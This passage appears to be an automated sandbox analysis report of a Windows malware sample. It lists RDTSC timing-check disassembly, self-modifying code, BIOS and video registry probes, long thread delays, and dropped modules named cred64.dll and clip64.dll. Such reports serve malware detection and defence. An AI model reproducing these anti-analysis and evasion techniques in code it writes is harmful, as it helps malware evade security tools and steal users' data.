                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801B3 second address: 51801C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801C2 second address: 51801C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801C6 second address: 51801CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801CC second address: 5180267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC73488207Ch 0x00000013 sub ah, FFFFFFD8h 0x00000016 jmp 00007FC73488207Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC734882088h 0x00000022 and ax, B038h 0x00000027 jmp 00007FC73488207Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FC734882084h 0x00000036 add esi, 3685AA98h 0x0000003c jmp 00007FC73488207Bh 0x00000041 popfd 0x00000042 push esi 0x00000043 movsx edi, si 0x00000046 pop ecx 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC73488207Dh 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180267 second address: 51802D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FC734E5F77Ch 0x00000010 call 00007FC734E5F782h 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F782h 0x0000001b jmp 00007FC734E5F785h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51802D0 second address: 51802D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51802D6 second address: 518030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734E5F786h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F77Eh 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 518030D second address: 5180356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734882086h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 push esi 0x00000013 mov bl, 10h 0x00000015 pop eax 0x00000016 mov bx, ABAAh 0x0000001a popad 0x0000001b je 00007FC7A662034Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FC73488207Ah 0x00000029 pop eax 0x0000002a mov esi, ebx 0x0000002c popad 0x0000002d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180356 second address: 51803FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov cx, 042Dh 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F77Ah 0x0000001b sbb eax, 16B83CC8h 0x00000021 jmp 00007FC734E5F77Bh 0x00000026 popfd 0x00000027 popad 0x00000028 je 00007FC7A6BFDA18h 0x0000002e jmp 00007FC734E5F786h 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 jmp 00007FC734E5F780h 0x0000003b or edx, dword ptr [ebp+0Ch] 0x0000003e jmp 00007FC734E5F780h 0x00000043 test edx, 61000000h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FC734E5F77Dh 0x00000052 and ah, FFFFFFF6h 0x00000055 jmp 00007FC734E5F781h 0x0000005a popfd 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51803FA second address: 5180446 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC7A66202E9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882084h 0x00000016 sub ecx, 665FF178h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180446 second address: 5180493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F784h 0x00000009 popad 0x0000000a popad 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007FC734E5F780h 0x00000014 jne 00007FC7A6BFD9A3h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734E5F787h 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180493 second address: 51804AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51804AB second address: 51804AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51706FD second address: 5170711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170711 second address: 517072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC734E5F783h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517072F second address: 5170736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170736 second address: 51707A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FC734E5F787h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC734E5F786h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub ax, AC88h 0x0000002a jmp 00007FC734E5F77Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707A1 second address: 51707C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707C5 second address: 51707CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707CB second address: 51707D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707D1 second address: 51707D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707D5 second address: 517080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734882084h 0x00000012 jmp 00007FC734882085h 0x00000017 popfd 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517080F second address: 517081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517081D second address: 517084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC734882086h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517084C second address: 5170850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170850 second address: 517086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517086D second address: 517089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517089B second address: 517089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517089F second address: 51708B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708B2 second address: 51708B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708B7 second address: 51708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FC734E5F787h 0x00000011 sub ebx, ebx 0x00000013 jmp 00007FC734E5F77Fh 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cl, ABh 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708F3 second address: 51708F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708F9 second address: 51708FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708FD second address: 5170911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC7A6627AFFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170911 second address: 5170917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170917 second address: 5170952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FC734882080h 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov bx, B2C0h 0x0000001e mov di, 3AECh 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170952 second address: 51709DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 0D97h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC7A6C051BDh 0x00000010 pushad 0x00000011 call 00007FC734E5F77Fh 0x00000016 mov bx, si 0x00000019 pop eax 0x0000001a pushad 0x0000001b mov dx, E176h 0x0000001f push edi 0x00000020 pop eax 0x00000021 popad 0x00000022 popad 0x00000023 test byte ptr [76FA6968h], 00000002h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FC734E5F77Fh 0x00000031 xor eax, 64ED01FEh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d mov esi, 03759647h 0x00000042 popad 0x00000043 jne 00007FC7A6C0516Fh 0x00000049 pushad 0x0000004a mov eax, 5179073Fh 0x0000004f movzx eax, bx 0x00000052 popad 0x00000053 mov edx, dword ptr [ebp+0Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC734E5F77Ah 0x0000005d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51709DC second address: 5170A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734882085h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A03 second address: 5170A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov ax, 2383h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC734E5F786h 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A48 second address: 5170A55 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A55 second address: 5170A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC734E5F77Fh 0x0000000a sub si, E98Eh 0x0000000f jmp 00007FC734E5F789h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: BEEE00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D8AB49 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D8A8F3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D95345 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: E16CC0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 76EE00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 90AB49 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 90A8F3 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 915345 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 996CC0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 3CBE93 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 5746A6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 572E9B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 3C94BA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 59D955 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 57ED5D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 5FBBC6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: DBE93 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 2846A6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 282E9B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: D94BA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 2AD955 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 28ED5D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: 30BBC6 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSpecial instruction interceptor: First address: DB4648 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSpecial instruction interceptor: First address: BF5AF5 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSpecial instruction interceptor: First address: E08FAD instructions caused by: Self-modifying code
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: BA4648 instructions caused by: Self-modifying code
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 9E5AF5 instructions caused by: Self-modifying code
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: BF8FAD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 684648 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 4C5AF5 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 6D8FAD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: 2610000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: 2680000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: 4680000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMemory allocated: 1830000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMemory allocated: 32A0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMemory allocated: 52A0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 180000
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1033
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 968
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1066
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1151
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1081
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1070
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 895
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4066
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5741
                              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9379
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 1149
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 821
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 1231
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 450
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeWindow / User API: threadDelayed 1415
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow / User API: threadDelayed 8437
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWindow / User API: threadDelayed 9310
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWindow / User API: threadDelayed 9274
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-11097
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe
